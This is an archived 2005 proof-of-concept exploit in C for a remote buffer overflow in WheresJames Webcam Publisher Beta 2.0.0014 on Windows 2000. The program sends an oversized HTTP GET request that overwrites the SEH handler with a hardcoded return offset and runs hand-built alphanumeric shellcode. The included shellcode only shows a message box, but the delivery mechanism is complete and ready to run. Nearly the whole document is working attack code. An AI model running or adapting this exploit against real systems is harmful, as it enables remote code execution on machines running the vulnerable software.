WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow

/*
 * WheresJames Webcam Publisher Beta 2.0.0014 POC (www.wheresjames.com)
 *
 *
 * Bug and Exploit by : Miguel Tarascó Acuña - Haxorcitos.com 2005
 *                      Tarako AT gmail.com - Tarako AT Haxorcitos.com
 *
 * Platforms tested:
 *
 *       - Windows 2000 SP4 Spanish
 *       - Probably All Windows 2000 versions
 *
 *
 * Exploit Date: 15/April/2005
 *
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 * Greetings to: #haxorcitos, #dsr and #localhost @efnet
 *
 *
 * Little Explanation:
 *
 * Buffer must only have bytes between 0x20 and 0x7A, this limits you to use 
 *  a generic shellcode.
 * I created a harcoded MessageBoxA alphanumeric Shellcode to run with this POC
 * Also the offset referenced by the Call ECX SEH handler overwriten, must contain
 *  only bytes between 0x20 and 0x7A
 *
 * 77F69B9F   8B4D 18          MOV ECX,DWORD PTR SS:[EBP+18]
 * 77F69BA2   FFD1             CALL ECX   
 *
 *  stack
 * 00000000
 * 00000000
 * XXXXXXXX  <-- EBX points to HERE (XX >= 0x20 && XX <= 0x7A)
 * YYYYYYYY  <-- This DWORD overwrites the SEH handler (the flow is taken in the CALL ECX)
 * 00000000
 * 00000000
 *
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

#define TIMEOUT 1
#define TOPHEADER "GET "
#define MIDDLEHEADER "\nHost: "
#define BOTTOMHEADER "\nUser-Agent: User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0)\n\
Accept: */*\n\
Accept-Language: es\n\
Accept-Encoding: gzip,deflate\n\
Keep-Alive: 100\n\
Connection: keep-alive\r\n\r\n"
#define BUFFERLEN 5000


char shellcode[] = // little harcoded alphanumeric "shellcode"
// haaaaX5aaaaP[H-,F3T--F3U5!@z!ShkitohTaraTZSSRSSPÃ
	"\x68\x61\x61\x61\x61" // PUSH 61616161     ;
	"\x58"                 // POP  EAX          ; EAX = 61616161 
	"\x35\x61\x61\x61\x61" // XOR  EAX,61616161 ; EAX = 00000000
	"\x50"                 // PUSH EAX          ;
	"\x5B"                 // POP  EBX          ; EBX = 00000000
	"\x48"                 // DEC  EAX          ; EAX = FFFFFFFF
	"\x2D\x2C\x46\x33\x54" // SUB  EAX,5433462C ; EAX = ABCCB9D3
	"\x2D\x2D\x46\x33\x55" // SUB  EAX,5533462D ; EAX = 569973A6
	"\x35\x21\x40\x7A\x21" // XOR  EAX,217A4021 ; EAX = 77E33387 USER32.MessageBoxA (Win2kSP4)
	"\x53"                 // PUSH EBX          ;
	"\x68\x6B\x69\x74\x6F" // PUSH 6F74696B     ; ASCII "kito"
	"\x68\x54\x61\x72\x61" // PUSH 61726154     ; ASCII "Tara"
	"\x54"                 // PUSH ESP          ;
	"\x5A"                 // POP  EDX          ; ASCII "Tarakito"
	"\x53"                 // PUSH EBX          ; 0
	"\x53"                 // PUSH EBX          ; 0
	"\x52"                 // PUSH EDX          ; Tarakito
	"\x53"                 // PUSH EBX          ; 0
	"\x53"                 // PUSH EBX          ; 0
	"\x50"                 // PUSH EAX          ; MessageBoxA
	"\xC3";                // RETN


struct  { char *name;  long offset; } supported[] = { 
   // 0x72712F5E (clbcatq.dll 2000.2.3511.0) ->  83C108 = ADD ECX,8  +  FFD1 = CALL ECX
   {"Windows 2000 Pro SP4 Spanish", 0x72712F5E }, 
   {"Crash", 0x41414141 }
},VERSIONES;


/******************************************************************************/
void ShowHeader(int argc,char *argv[]) {
   int i;
   printf("\n WheresJames Webcam Publisher Beta 2.0.0014 Buffer Overflow POC\n");
   printf(" Exploit by Miguel Tarasco - Tarako [at] gmail [dot] com\n");
	
   printf("\n Windows Versions:\n");
   printf(" ---------------------------------------------\n");
   for (i=0;i<sizeof(supported)/sizeof(VERSIONES);i++) {
      printf("  %d) %s (0x%08x)\n",i,supported[i].name,supported[i].offset);
   }
   printf(" ---------------------------------------------\n\n");
   if (argc<4) {      
      printf(" Usage: %s <IP> <Port> <Option>\n",argv[0]);
      exit(1);
      exit(1);
   }
}
/******************************************************************************/

void main(int argc, char *argv[]) {
   SOCKET s;
   
   WSADATA HWSAdata;
   struct  sockaddr_in sa;

   char *buffer=NULL;

   ShowHeader(argc,argv);

   if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { 
      printf("\n [e] Error: WSAStartup():%d\n", WSAGetLastError()); 
      exit(1); 
   }

   if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ 
      printf("\n [e] Error: socket():%d\n", WSAGetLastError()); 
      exit(1); 
   }

   sa.sin_family           = AF_INET;
   sa.sin_port             = (USHORT)htons(atoi(argv[2]));
   sa.sin_addr.S_un.S_addr = inet_addr(argv[1]);

   if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { 
      printf("\n [e] Error: connect()"); 
      exit(1); 
   }

   printf(" [i] Connected : Yes\n");
   printf(" [i] Target    : %s\n",supported[atoi(argv[3])].name);

   buffer=(char*)malloc(strlen(TOPHEADER)+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+1+strlen(argv[2])+strlen(BOTTOMHEADER)+1); 
   memset(buffer,0,sizeof(buffer));

   memcpy(buffer,TOPHEADER,strlen(TOPHEADER));

   memset(buffer+strlen(TOPHEADER),'A',BUFFERLEN);

   memcpy(buffer+strlen(TOPHEADER)+1052,&supported[atoi(argv[3])].offset,sizeof(long));

   memcpy(buffer+strlen(TOPHEADER)+1060,shellcode,strlen(shellcode));

   memcpy(buffer+BUFFERLEN,MIDDLEHEADER,strlen(MIDDLEHEADER));
   memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER),argv[1],strlen(argv[1]));
   memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1]),":",strlen(":"));
   memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":"),argv[2],strlen(argv[2]));
   memcpy(buffer+BUFFERLEN+strlen(MIDDLEHEADER)+strlen(argv[1])+strlen(":")+strlen(argv[2]),BOTTOMHEADER,strlen(BOTTOMHEADER));

   send(s,buffer,strlen(buffer),0);

   printf(" [i] Buffer sent\n\n");

   closesocket(s);

}

// milw0rm.com [2005-04-18]